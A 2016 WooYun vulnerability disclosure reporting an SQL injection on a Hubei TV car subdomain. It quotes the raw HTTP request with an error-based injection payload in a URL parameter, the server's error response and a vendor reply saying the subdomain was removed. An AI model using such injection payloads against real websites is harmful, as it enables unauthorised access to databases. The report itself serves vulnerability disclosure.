当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0179741

漏洞标题:湖北卫视 sql

相关厂商:湖北电视台

漏洞作者: H.U.C-人 族

提交时间:2016-03-01 11:38

修复时间:2016-03-01 17:02

公开时间:2016-03-01 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-01: 细节已通知厂商并且等待厂商处理中
2016-03-01: 厂商已经确认,细节仅向厂商公开
2016-03-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

GET /cartitle.aspx?s2=convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(85)%2bCHAR(115)%2bCHAR(51)%2bCHAR(71)%2bCHAR(119)%2bCHAR(118)%2bCHAR(122)) HTTP/1.1
Cookie: ASP.NET_SessionId=jpuc4d1hbhfvybkbvhg3h2dz; CNZZDATA1350473=cnzz_eid%3D621333911-1456796714-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1456796714
Host: car.hbtv.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 01 Mar 2016 01:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6403

漏洞证明:

360截图20160301104531092.jpg

360截图20160301104445205.jpg

修复方案:

看着办

版权声明:转载请注明来源 H.U.C-人 族@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-03-01 16:41

厂商回复:

谢谢贵帽对我司的关注,该二级域名为第三方厂商合作临时所用,该合作未正式启动,已经将该二级域名删除。

最新状态:

2016-03-01:该二级域名为第三方厂商合作临时所用,该合作未正式启动,已经将该二级域名删除。